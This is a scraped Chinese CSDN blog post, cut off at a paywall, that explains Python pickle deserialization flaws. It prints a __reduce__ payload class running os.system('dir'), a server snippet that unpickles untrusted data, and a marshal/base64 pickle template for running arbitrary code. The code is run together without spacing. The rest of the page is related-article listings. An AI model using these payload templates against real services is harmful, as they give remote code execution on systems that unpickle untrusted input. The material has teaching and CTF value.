python marshal loads failed_python pickle命令执行与marshal 任意代码执行

最新推荐文章于 2024-04-27 00:18:59 发布
最新推荐文章于 2024-04-27 00:18:59 发布
阅读量340 收藏
点赞数
文章标签: python marshal loads failed
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42417004/article/details/113638759
版权

1.python pickle反序列化漏洞

自己的理解:

由于在类的__reduce__方法中提供了我们可以自定义程序如何去解序列化的方法,因此如果应用程序接受了不可信任的序列化的数据,那么就可能导致安全问题。

importpickleimportosclassgen(object):def __reduce__(self):

s= """dir"""

returnos.system, (s,)

p=gen()

payload=pickle.dumps(p)

with open('payload.pkl', 'wb') as f:

f.write(payload)

以上这段代码中,要调用os模块的system函数来执行dir命令,其中reduce函数中的返回值中需要定义的有要调用的函数,需要传给函数的参数(以元组的形式给出);

接着只需要将该对象实例化后再序列化即可

importpickle

'''

some code

'''

pickle.load(open('./payload.pkl'))

'''

some code

'''

假设以上这段代码是服务器端处理反序列数据的时候的操作,其中没有将要调用的对象函数进行过滤,而是直接进行解序列化,导致代码执行 os.system("dir") 。

2.pickle任意代码执行

importmarshalimportbase64deffoo():pass #Your code here

print """ctypes

FunctionType

(cmarshal

loads

(cbase64

b64decode

(S'%s'

tRtRc__builtin__

globals

(tRS''

tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))

我们只需要在foo函数中写上需要执行的代码即可。

code_str =base64.b64decode(code_enc)

code=marshal.loads(code_str)

func= types.FunctionType(code, globals(), '')

func()

执行以上函数便可以触发任意代码执行漏洞

from __future__ importunicode_literalsfrom flask importFlask, request, make_response, redirect, url_for, sessionfrom flask importrender_template, flash, redirect, url_for, requestfrom werkzeug.security

最低0.47元/天 解锁文章
weixin_42417004
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python marshal loads failed_PyArmor简单使用
weixin_34662807的博客
03-01 3106
PyArmor 是一个用于加密和保护 Python 脚本的工具。它能够在运行时刻保护 Python脚本的二进制代码不被泄露,设置加密后 Python代码的有效期限,绑 定加密后的Python代码到硬盘、网卡等硬件设备。安装 PyArmor可以直接从这里 PyPi 下载, 但是更方便的方式是通过 pip ,直接 运行下面的命令进行安装:pip install pyarmor需要升级的话,执行下...
python marshal loads failed_pythonMarshal反序列化 – 不安全
weixin_35050881的博客
03-01 619
我在一个项目中工作,我使用cPickle快速加载文件.几天前我读到,元帅甚至可能比cPickle更快.它对我有用,但我很好奇,the documentation的这个警告是关于:WarningThe marshal module is not intended to be secure against erroneous or maliciously constructed data. Never...
Python marshal模块 主要函数 marshal.dump(object, file) Marshal.dumps(object) Marshal.load——《跟老吕学Python编程》
最新发布
Python老吕的博客
04-27 828
是一个强大的工具,用于在Python中处理二进制数据。通过了解它的功能和限制,你可以更有效地使用它来序列化和反序列化Python对象。然而,由于它的限制,如果你需要处理更复杂的对象或需要在不同的Python版本或平台上交换数据,你可能需要考虑使用其他序列化模块,如pickle或json。👨‍💻博主Python老吕评论,您的举手之劳将对我提供了无限的写作动力!🤞🔥《跟老吕学Python编程》《Python游戏开发实战讲解》《Python Web开发实战》《Python网络爬虫实战》
python marshal loads failed_python使用marshal模块序列化实例
weixin_35823403的博客
02-09 928
本文实例讲述了python使用marshal模块序列化的方法,分享给大家供大家参考。具体方法如下:先来看看下面这段代码:?12345678910111213141516171819202122232425262728 import marshal data1 = ['abc',12,23,'jb51'] #几个测试数据 data2 = {1:'aaa',b:'dad'} data3 = (1,2,...
python marshal loads failed_在Pythonmarshal对象序列化的相关知识
weixin_29453497的博客
02-02 678
有时候,要把内存中的一个对象持久化保存到磁盘上,或者序列化成二进制流通过网络发送到远程主机上。Python中有很多模块提供了序列化与反序列化的功能,如:marshal, pickle, cPickle等等。今天就讲讲marshal模块。注意: marshal并不是一个通用的模块,在某些时候它是一个不被推荐使用的模块,因为使用marshal序列化的二进制数据格式还没有文档化,在不同版本的Python...
Runtime Error
夕小瑶科技说
07-05 1万+
运行时错误,也被称为runtime error,是指程序执行期间由于各种原因出现的异常情况,导致程序无法正常运行。这类错误并非在代码编写阶段就能被发现,而是在程序运行时随机出现。有许多因素可能导致这类错误,包括无效的输入,硬件故障,系统问题,网络故障或者错误的代码逻辑等。
python使用marshal模块序列化实例
12-25
本文实例讲述了python使用marshal模块序列化的方法,分享给大家供大家参考。具体方法如下: 先来看看下面这段代码: import marshal data1 = ['abc',12,23,'jb51'] #几个测试数据 data2 = {1:'aaa',"b":'dad'} data...
Pythonmarshal对象序列化的相关知识
01-20
Python中有很多模块提供了序列化与反序列化的功能,如:marshal, pickle, cPickle等等。今天就讲讲marshal模块。 注意: marshal并不是一个通用的模块,在某些时候它是一个不被推荐使用的模块,因为使用marshal序列...
详解Python中的序列化与反序列化的使用
01-20
还好,python标准库提供了功能更加强大且更加安全的pickle和cPickle模块。 cPickle模块是使用C语言实现的,所以在运行效率上比pickle要高。但是cPickle模块中定义的类型不能被继承(其实大多数时候,我们不需要从...
strazegy-marshal.rar_The Network
07-14
"strazegy-marshal.rar_The Network" 提供了一系列与神经网络控制相关的代码示例,是学习和研究神经网络控制策略的重要资源。以下是对这些文件的详细解读: 1. **tareadme.fst**:通常这是一个项目或软件的说明文件...
pythonmarshal --- 内部 Python 对象序列化
点点关注不迷路
03-07 247
pythonmarshal --- 内部 Python 对象序列化
pyarmor:用于混淆python脚本,将混淆的脚本绑定到固定计算机或使混淆的脚本过期的工具
05-12
PyArmor () () PyArmor是用于混淆Python脚本,将混淆后的脚本绑定到固定计算机或使混淆后的脚本失效的命令行工具。 它通过以下方式保护Python脚本: 混淆代码对象以保护常量和文字字符串。 在运行时混淆每个函数(代码对象)的co_code。 代码对象完成执行后立即清除frame的f_locals。 在运行混淆脚本的许可证文件时,请对其进行验证。 另请参阅 支持平台 Python 2.7和Python3 预建平台:win32,win_amd64,linux_i386,linux_x86_64,macosx_x86_64 嵌入式平台:Raspberry Pi,Banana Pi,Orange Pi,TS-4600 / TS-7600等 参考 快速开始 安装 pip install pyarmor 混淆脚本 pyarmor obfuscate foo.
runtimeerror什么原因_runtime error 解决方法
热门推荐
weixin_39653481的博客
11-24 5万+
1:第一步键盘上同时按“win+R”键打开运行,在运行输入框中输入“regedit”,如下图所示。点击确定2:进去注册表之后,找到“HKEY_LOCAL_MACHINE/SOFTWARE/microsoft/Windows/CurrentVersion/Run”3:点击“Run”之后,在右侧中找到“runtime”的错误信息,然后将它删除就完成了,不会对电脑系统有影响4:也可以按“Ctrl+F”键...
一文了解Python常见的序列化操作
Python热爱者的博客
11-03 543
1.marshal marshal使用的是与Python语言相关但与机器无关的二进制来读写Python对象的。这种二进制的格式也跟Python语言的版本相关,marshal序列化的格式对不同的版本的Python是不兼容的。 marshal一般用于Python内部对象的序列化。 一般地包括: 基本类型 booleans, integers,floating point numbers,complex numbers 序列集合类型 strings, bytes, bytearray, tuple, list,
【DL】——code = marshal.loads(raw_code) ValueError: bad marshal data (unknown type code)
怡宝2号
07-01 1492
Keras, 模型载入 code from keras.models import model_from_json import layers_builder as layers from keras.utils.generic_utils import CustomObjectScope path = "/home/darknet/CM/23_SLAM/Semantic_SLAM/Third_Part/PSPNet_Keras_tensorflow/weights/keras/pspnet101_c.
Python模块学习 ---- marshal 对象的序列化
09-12 5963
  有时候,要把内存中的一个对象持久化保存到磁盘上,或者序列化成二进制流通过网络发送到远程主机上。Python中有很多模块提供了序列化与反序列化的功能,如:marshal, pickle, cPickle等等。今天就讲讲marshal模块。   注意:marshal并不是一个通用的模块,在某些时候它是一个不被推荐使用的模块,因为使用marshal序列化的二进制数据格式还没有文档化,在不
Python标准库中的marshal模块
李世铭的博客
04-03 8081
 marshal-内部的Python对象序列化         该模块包含可以以二进制格式读取和写入Python值的函数。该格式是针对Python的,但独立于机器架构问题(例如,您可以将Python值写入PC上的文件,将文件传输到Sun,并在那里读取它)。使用marshal序列化的二进制数据格式还没有文档化,它可能会在Python版本之间发生变化(尽管很少发生)。        
p83 CTF夺旗 Python考点SST&反序列化&字符串
weixin_43263566的博客
03-24 1128
CTF夺旗 Python考点SST&反序列化&字符串
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值